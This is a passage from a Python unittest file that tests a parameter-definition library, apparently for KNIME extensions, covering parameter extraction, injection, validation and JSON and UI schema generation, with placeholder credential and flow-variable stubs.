= kp.IntParameter(\"Outer param\", \"Outer param description.\", 54321)\n\n # will call the InnerClass method as the default value in the constructor\n subgroup_1 = SubgroupWithInnerClass()\n\n def __init__(self, param):\n self.param = param\n\n # will call the InnerClass attribute to be added to the provided value\n self.subgroup_2 = SubgroupWithInnerClass(param=69)\n\n\nclass ParameterizedWithInnerClassGroups:\n group = GroupCallingInnerClass(param=SubgroupWithInnerClass.InnerClass.attr_1 + 41)\n\n\nclass ParameterizedWithDialogCreationContext:\n credential_param = kp.StringParameter(\n label=\"Credential param\",\n description=\"Choices is a callable\",\n choices=lambda a: kn.DialogCreationContext.get_credential_names(a),\n )\n flow_variable_param = kp.StringParameter(\n label=\"Flow variable param\",\n description=\"Call it a choice\",\n choices=lambda a: kn.DialogCreationContext.get_flow_variables(a),\n )\n\n\nclass TestEnumOptions(kp.EnumParameterOptions):\n FOO = (\"Foo\", \"The foo\")\n BAR = (\"Bar\", \"The bar\")\n BAZ = (\"Baz\", \"The baz\")\n\n\nclass ParameterizedWithEnumStyles:\n radio = kp.EnumParameter(\n \"radio\",\n \"Radio buttons\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.RADIO,\n )\n value_switch = kp.EnumParameter(\n \"value switch\",\n \"Value switch\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.VALUE_SWITCH,\n )\n dropdown = kp.EnumParameter(\n \"Dropdown\",\n \"dropdown\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.DROPDOWN,\n )\n default = kp.EnumParameter(\n \"Default\",\n \"The default (should be radio for fewer than 4 choices)\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n )\n\n\nclass DummyDialogCreationContext:\n def __init__(self) -> None:\n class DummyJavaContext:\n def get_credential_names(self):\n return [\"foo\", \"bar\", \"baz\"]\n\n def get_credential(self, name):\n return \"dummy\"\n\n self._java_ctx = DummyJavaContext()\n self._flow_variables = [\"flow1\", \"flow2\", \"flow3\"]\n\n def get_input_specs(self):\n return [test_schema]\n\n\n#### Tests: ####\nclass ParameterTest(unittest.TestCase):\n def setUp(self):\n self.parameterized = Parameterized()\n self.parameterized_advanced_option = ParameterizedWithAdvancedOption()\n self.versioned_parameterized = VersionedParameterized()\n self.parameterized_without_group = ParameterizedWithoutGroup()\n self.parameterized_with_custom_methods = ParameterizedWithCustomMethods()\n self.parameterized_with_dialog_creation_context = (\n ParameterizedWithDialogCreationContext()\n )\n self.parameterized_with_indented_docstring = ParameterizedIndentation()\n\n self.maxDiff = None\n\n def test_forbidden_keywords_not_allowed(self):\n with self.assertRaises(SyntaxError):\n # we define these inside the test case since the error should be caused\n # when the parameter group class is initially parsed.\n @kp.parameter_group(\"Group with forbidden keyword arguments.\")\n class GroupWithForbiddenKwargs:\n param = kp.IntParameter(\"Simple param\", \"Simple param.\", 1)\n\n def __init__(self, since_version=\"foo\", normal_arg=1):\n self.param = normal_arg\n\n class ParameterizedWithForbiddenKwargs:\n group = GroupWithForbiddenKwargs(\"bar\", 10)\n\n def test_inner_classes_are_accessible(self):\n obj = ParameterizedWithInnerClassGroups()\n params = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"group\": {\n \"param\": 42,\n \"subgroup_1\": {\"inner_param\": 101},\n \"subgroup_2\": {\"inner_param\": 70},\n }\n }\n }\n self.assertEqual(params, expected)\n self.assertEqual(obj.group.subgroup_1.InnerClass._some_inner_method(), 100)\n\n def test_parameter_group_constructors_set_values(self):\n obj = ParameterizedUsingConstructor()\n params = kp.extract_parameters(obj)\n expected = {\"model\": {\"group\": {\"param\": 42, \"subgroup\": {\"inner_param\": 69}}}}\n self.assertEqual(params, expected)\n\n def test_inject_with_version_dependent_defaults(self):\n obj = VersionedDefaultsParameterized()\n params = {\"model\": {\"int_param\": 5}}\n\n kp.inject_parameters(obj, params, \"0.0.0\")\n self.assertEqual(obj.int_param, 5)\n self.assertEqual(obj.double_param, 0.5)\n self.assertEqual(obj.group.first, -1)\n kp.inject_parameters(obj, params, \"0.1.0\")\n self.assertEqual(obj.int_param, 5)\n self.assertEqual(obj.double_param, 1.5)\n self.assertEqual(obj.group.first, 1)\n\n def test_init_versioned_default_on_get(self):\n kp.set_extension_version(\"0.2.0\")\n obj = VersionedDefaultsParameterized()\n self.assertEqual(obj.int_param, 3)\n self.assertEqual(obj.double_param, 1.5)\n self.assertEqual(obj.group.first, 1)\n\n #### Test central functionality: ####\n def test_getting_parameters(self):\n \"\"\"\n Test that parameter values can be retrieved.\n \"\"\"\n set_column_parameters(self.parameterized)\n\n # root-level parameters\n self.assertEqual(self.parameterized.int_param, 3)\n self.assertEqual(self.parameterized.double_param, 1.5)\n self.assertEqual(self.parameterized.string_param, \"foo\")\n self.assertEqual(self.parameterized.bool_param, True)\n self.assertEqual(self.parameterized.column_param, \"foo_column\")\n self.assertEqual(\n self.parameterized.multi_column_param, [\"foo_column\", \"bar_column\"]\n )\n self.assertEqual(\n self.parameterized.full_multi_column_param,\n kp.ColumnFilterConfig(\n manual_filter=kp.ManualFilterConfig(\n included=[\"foo_column\", \"bar_column\"]\n )\n ),\n )\n\n # group-level parameters\n self.assertEqual(self.parameterized.parameter_group.third, 3)\n\n # subgroup-level parameters\n self.assertEqual(self.parameterized.parameter_group.subgroup.first, 1)\n\n def test_setting_parameters(self):\n \"\"\"\n Test that parameter values can be set.\n \"\"\"\n # root-level parameters\n self.parameterized.int_param = 5\n self.parameterized.double_param = 5.5\n self.parameterized.string_param = \"bar\"\n self.parameterized.bool_param = False\n self.parameterized.column_param = \"foo_column\"\n self.parameterized.multi_column_param = [\"foo_column\", \"bar_column\"]\n\n # group-level parameters\n self.assertEqual(self.parameterized.int_param, 5)\n self.assertEqual(self.parameterized.double_param, 5.5)\n self.assertEqual(self.parameterized.string_param, \"bar\")\n self.assertEqual(self.parameterized.bool_param, False)\n self.assertEqual(self.parameterized.column_param, \"foo_column\")\n self.assertEqual(\n self.parameterized.multi_column_param, [\"foo_column\", \"bar_column\"]\n )\n\n # subgroup-level parameters\n self.parameterized.parameter_group.subgroup.first = 2\n self.assertEqual(self.parameterized.parameter_group.subgroup.first, 2)\n\n def test_extracting_parameters(self):\n \"\"\"\n Test extracting nested parameter values.\n \"\"\"\n set_column_parameters(self.parameterized)\n\n params = kp.extract_parameters(self.parameterized)\n expected = generate_values_dict()\n self.assertEqual(params, expected)\n\n def test_inject_parameters(self):\n params = generate_values_dict(\n 4,\n 2.7,\n \"bar\",\n \"bar\",\n False,\n \"foo_column\",\n [\"foo_column\", \"bar_column\"],\n kp.ColumnFilterConfig(\n manual_filter=kp.ManualFilterConfig(\n included=[\"foo_column\", \"bar_column\"]\n )\n ),\n 3,\n 2,\n 1,\n )\n\n kp.inject_parameters(self.parameterized, params)\n extracted = kp.extract_parameters(self.parameterized)\n self.assertEqual(params, extracted)\n\n def test_inject_parameters_with_missing_allowed(self):\n obj = Parameterized()\n params = {\"model\": {\"int_param\": 5}}\n\n kp.inject_parameters(obj, params)\n\n set_column_parameters(obj)\n\n extracted = kp.extract_parameters(obj)\n expected = generate_values_dict(5)\n self.assertEqual(expected, extracted)\n\n def test_extract_schema(self):\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"multiline_string_param\": {\n \"title\": \"Multiline String Parameter\",\n \"description\": \"A multiline string parameter\",\n \"type\": \"string\",\n },\n \"bool_param\": {\n \"title\": \"Boolean Parameter\",\n \"description\": \"A boolean parameter\",\n \"type\": \"boolean\",\n },\n \"column_param\": {\n \"title\": \"Column Parameter\",\n \"description\": \"A column parameter\",\n \"type\": \"string\",\n },\n \"multi_column_param\": {\n \"title\": \"Multi Column Parameter\",\n \"description\": \"A multi column parameter\",\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n },\n \"full_multi_column_param\": {\n \"title\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n \"type\": \"object\",\n \"properties\": {\n \"patternFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"isCaseSensitive\": {\n \"type\": \"boolean\",\n \"default\": True,\n },\n \"isInverted\": {\n \"type\": \"boolean\",\n \"default\": False,\n },\n \"pattern\": {\"type\": \"string\", \"default\": \"\"},\n },\n },\n \"typeFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"selectedTypes\": {\n \"default\": [],\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n },\n \"typeDisplays\": {\n \"default\": [],\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"id\": {\"type\": \"string\"},\n \"text\": {\"type\": \"string\"},\n },\n },\n },\n },\n },\n \"manualFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"includeUnknownColumns\": {\n \"type\": \"boolean\",\n \"default\": True,\n },\n \"manuallyDeselected\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"default\": [],\n },\n \"manuallySelected\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"default\": [],\n },\n },\n },\n \"mode\": {\n \"oneOf\": [\n {\"const\": \"MANUAL\", \"title\": \"Manual\"},\n {\"const\": \"REGEX\", \"title\": \"Regex\"},\n {\"const\": \"WILDCARD\", \"title\": \"Wildcard\"},\n {\"const\": \"TYPE\", \"title\": \"Type\"},\n ]\n },\n \"selected\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"configKeys\": [\"selected_Internals\"],\n },\n \"configKeys\": [\"selected_Internals\"],\n },\n },\n },\n \"parameter_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"subgroup\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second\": {\n \"title\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n \"third\": {\n \"title\": \"Internal int Parameter\",\n \"description\": \"Internal int parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n }\n },\n }\n extracted = kp.extract_schema(self.parameterized)\n self.assertEqual(expected, extracted)\n\n def test_extract_dialog_creation_context_parameters(self):\n # test credential names\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"credential_param\": {\n \"title\": \"Credential param\",\n \"description\": \"Choices is a callable\",\n \"oneOf\": [\n {\"const\": \"foo\", \"title\": \"foo\"},\n {\"const\": \"bar\", \"title\": \"bar\"},\n {\"const\": \"baz\", \"title\": \"baz\"},\n ],\n },\n \"flow_variable_param\": {\n \"title\": \"Flow variable param\",\n \"description\": \"Call it a choice\",\n \"oneOf\": [\n {\"const\": \"flow1\", \"title\": \"flow1\"},\n {\"const\": \"flow2\", \"title\": \"flow2\"},\n {\"const\": \"flow3\", \"title\": \"flow3\"},\n ],\n },\n },\n }\n },\n }\n dummy_dialog = DummyDialogCreationContext()\n extracted = kp.extract_schema(\n self.parameterized_with_dialog_creation_context,\n dialog_creation_context=dummy_dialog,\n )\n\n self.assertEqual(expected, extracted)\n\n def test_extract_ui_schema(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/int_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/double_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\"},\n },\n {\n \"scope\": \"#/properties/model/properties/string_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5},\n },\n {\n \"scope\": \"#/properties/model/properties/bool_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\"},\n },\n {\n \"scope\": \"#/properties/model/properties/column_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/full_multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Full Multi Column Parameter\",\n \"options\": {\n \"format\": \"columnFilter\",\n \"showSearch\": True,\n \"showMode\": True,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n self.parameterized, DummyDialogCreationContext()\n )\n self.assertEqual(expected, extracted)\n\n def test_enum_styles(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"radio\",\n \"scope\": \"#/properties/model/properties/radio\",\n \"options\": {\"format\": \"radio\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"value switch\",\n \"scope\": \"#/properties/model/properties/value_switch\",\n \"options\": {\"format\": \"valueSwitch\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Dropdown\",\n \"scope\": \"#/properties/model/properties/dropdown\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Default\",\n \"scope\": \"#/properties/model/properties/default\",\n \"options\": {\"format\": \"radio\"},\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n ParameterizedWithEnumStyles(), DummyDialogCreationContext()\n )\n self.assertEqual(expected, extracted)\n\n def test_extract_ui_schema_is_advanced_option(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/int_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/int_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/double_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\"},\n },\n {\n \"scope\": \"#/properties/model/properties/double_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/string_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"scope\": \"#/properties/model/properties/string_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5, \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/bool_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\"},\n },\n {\n \"scope\": \"#/properties/model/properties/bool_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/column_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/column_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/full_multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Full Multi Column Parameter\",\n \"options\": {\n \"format\": \"columnFilter\",\n \"showSearch\": True,\n \"showMode\": True,\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group Advanced\",\n \"options\": {\"isAdvanced\": True},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n self.parameterized_advanced_option,\n DummyDialogCreationContext(),\n )\n self.assertEqual(expected, extracted)\n\n def test_default_validators(self):\n \"\"\"\n Test the default type-checking validators provided with each parameter class.\n \"\"\"\n with self.assertRaises(TypeError):\n self.parameterized.int_param = \"foo\"\n\n with self.assertRaises(TypeError):\n self.parameterized.string_param = 1\n\n with self.assertRaises(TypeError):\n self.parameterized.bool_param = 1\n\n def test_custom_validators(self):\n \"\"\"\n Test custom validators for parameters.\n\n Note: custom validators can currently only be set inside of the parameter\n group class definition.\n \"\"\"\n with self.assertRaises(ValueError):\n self.parameterized.parameter_group.third = -1\n\n with self.assertRaises(ValueError):\n self.parameterized.string_param = \"hello there, General Kenobi\"\n\n # Check that the default type validators still work\n with self.assertRaises(TypeError):\n self.parameterized.parameter_group.third = \"foo\"\n\n with self.assertRaises(TypeError):\n self.parameterized.string_param = 1\n\n def test_group_validation(self):\n \"\"\"\n Test validators for parameter groups. Group validators can be set internally inside the\n group class definition using the validate(self, values) method, or externally using the\n @group_name.validator decorator notation.\n\n Validators for parameterized.parameter_group.subgroup:\n - Internal validator: sum of values must not be larger than 100.\n - External validator: sum of values must not be negative OR 'first' must not be equal to 42.\n \"\"\"\n params_internal = generate_values_dict(first=100)\n params_external = generate_values_dict(first=-90)\n params_forbidden = generate_values_dict(first=42)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_internal)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_external)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_forbidden)\n\n def test_groups_are_independent(self):\n obj1 = Parameterized()\n obj2 = Parameterized()\n group1 = obj1.parameter_group\n group1.third = 5\n self.assertEqual(group1.third, 5)\n obj2.parameter_group.third = 7\n self.assertEqual(group1.third, 5)\n\n #### Test parameter composition: ####\n def test_extract_parameters_from_uninitialized_composed(self):\n obj = ComposedParameterized()\n parameters = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 12345, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(parameters, expected)\n\n def test_all_pipelines(self):\n \"\"\"\n Test getting and setting for simple parameters and parameter groups.\n Both descriptor-based and composed approaches are tested.\n \"\"\"\n ##### descriptor-based #####\n # descriptor non-nested\n obj_descr_simple = self.parameterized_without_group\n obj_descr_simple = ParameterizedWithoutGroup()\n set_column_parameters(obj_descr_simple)\n # test getting\n self.assertEqual(obj_descr_simple.int_param, 3)\n # test setting\n obj_descr_simple.int_param = 42\n descr_simple_extracted = kp.extract_parameters(obj_descr_simple)\n descr_simple_expected = generate_values_dict_without_groups(42)\n self.assertEqual(descr_simple_extracted, descr_simple_expected)\n\n # descriptor one group\n obj_descr_one_group = ParameterizedWithOneGroup()\n set_column_parameters(obj_descr_one_group)\n # test getting\n self.assertEqual(obj_descr_one_group.parameter_group.first, 1)\n # test setting\n obj_descr_one_group.parameter_group.first = 42\n descr_one_group_extracted = kp.extract_parameters(obj_descr_one_group)\n descr_one_group_expected = generate_values_dict_with_one_group(first=42)\n self.assertEqual(descr_one_group_extracted, descr_one_group_expected)\n\n # descriptor nested groups\n obj_descr_nested_groups = Parameterized()\n set_column_parameters(obj_descr_nested_groups)\n # test getting\n self.assertEqual(obj_descr_nested_groups.parameter_group.subgroup.first, 1)\n # test setting\n obj_descr_nested_groups.parameter_group.subgroup.first = 42\n descr_nested_groups_extracted = kp.extract_parameters(obj_descr_nested_groups)\n descr_nested_groups_expected = generate_values_dict(first=42)\n self.assertEqual(descr_nested_groups_extracted, descr_nested_groups_expected)\n\n ##### composed #####\n # # composed non-nested (here `param` was also declared as a class-level descriptor)\n # obj_composed_simple = ComposedParameterizedWithoutGroup(54321)\n # # test getting\n # self.assertEqual(obj_composed_simple.param, 54321)\n # # test setting\n # obj_composed_simple.param = 42\n # composed_simple_extracted = kp.extract_parameters(obj_composed_simple)\n # composed_simple_expected = {\"model\": {\"param\": 42}}\n # self.assertEqual(composed_simple_extracted, composed_simple_expected)\n\n # composed one group\n obj_composed_one_group = ComposedParameterized()\n # test getting\n self.assertEqual(obj_composed_one_group.first_group.first_param, 12345)\n # test setting\n obj_composed_one_group.first_group.first_param = 42\n composed_one_group_extracted = kp.extract_parameters(obj_composed_one_group)\n composed_one_group_expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 42, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(composed_one_group_extracted, composed_one_group_expected)\n\n # composed nested groups\n obj_composed_nested_groups = NestedComposedParameterized()\n # test getting\n self.assertEqual(\n obj_composed_nested_groups.group.first_group.first_param, 12345\n )\n # test setting\n obj_composed_nested_groups.group.first_group.first_param = 42\n composed_nested_groups_extracted = kp.extract_parameters(\n obj_composed_nested_groups\n )\n composed_nested_groups_expected = (\n obj_composed_nested_groups.create_default_dict()\n )\n composed_nested_groups_expected[\"model\"][\"group\"][\"first_group\"][\n \"first_param\"\n ] = 42\n\n self.assertEqual(\n composed_nested_groups_extracted, composed_nested_groups_expected\n )\n\n def test_extract_parameters_from_altered_composed(self):\n obj = ComposedParameterized()\n obj.first_group.first_param = 3\n parameters = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 3, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(parameters, expected)\n\n def test_extract_altered_nested_composition(self):\n obj = NestedComposedParameterized()\n obj.group.first_group.first_param = 42\n extracted = kp.extract_parameters(obj)\n expected = NestedComposedParameterized.create_default_dict()\n expected[\"model\"][\"group\"][\"first_group\"][\"first_param\"] = 42\n self.assertEqual(expected, extracted)\n\n def test_extract_default_nested_compositon(self):\n obj = NestedComposedParameterized()\n extracted = kp.extract_parameters(obj)\n expected = NestedComposedParameterized.create_default_dict()\n self.assertEqual(expected, extracted)\n\n def test_inject_extract_nested_composition(self):\n obj = NestedComposedParameterized()\n inject = NestedComposedParameterized.create_default_dict()\n inject[\"model\"][\"group\"][\"first_group\"][\"first_param\"] = 2\n inject[\"model\"][\"group\"][\"second_group\"][\"first_param\"] = -5\n kp.inject_parameters(obj, inject, None)\n extracted = kp.extract_parameters(obj)\n self.assertEqual(inject, extracted)\n\n def test_nested_composed_init_setting(self):\n \"\"\"\n Test value retention when the root group of a nested series of groups is defined inside __init__.\n Test both composed and descriptor nested groups.\n \"\"\"\n obj = ComplexNestedComposedParameterized()\n obj_expected = obj.get_expected_params()\n\n inject_composed = obj_expected.copy()\n inject_composed[\"model\"][\"init_group\"][\"group_root_param\"] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"new_constructor_param\"] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_root_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_root_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_init_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_init_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n kp.inject_parameters(obj, inject_composed)\n composed_extracted = kp.extract_parameters(obj)\n self.assertEqual(composed_extracted, inject_composed)\n\n def test_nested_composed_descriptor_setting(self):\n \"\"\"\n Test value retention when the root group of a nested series of groups is a descriptor.\n Test both composed and descriptor nested groups.\n \"\"\"\n obj = ComplexNestedComposedParameterized()\n obj_expected = obj.get_expected_params()\n\n inject_descriptor = obj_expected.copy()\n inject_descriptor[\"model\"][\"root_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"new_constructor_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n\n inject_descriptor[\"model\"][\"root_group\"][\"group_init_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_init_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n kp.inject_parameters(obj, inject_descriptor)\n descriptor_extracted = kp.extract_parameters(obj)\n self.assertEqual(descriptor_extracted, inject_descriptor)\n\n def test_extract_schema_from_composed(self):\n obj = ComposedParameterized()\n schema = kp.extract_schema(obj)\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_param\": {\n \"title\": \"Plain int param\",\n \"description\": \"Description of the plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second_param\": {\n \"title\": \"Second int param\",\n \"description\": \"Description of the second plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n \"second_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_param\": {\n \"title\": \"Plain int param\",\n \"description\": \"Description of the plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second_param\": {\n \"title\": \"Second int param\",\n \"description\": \"Description of the second plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n },\n },\n }\n self.assertEqual(schema, expected)\n\n def test_extract_ui_schema_from_composed(self):\n obj = ComposedParameterized()\n ui_schema = 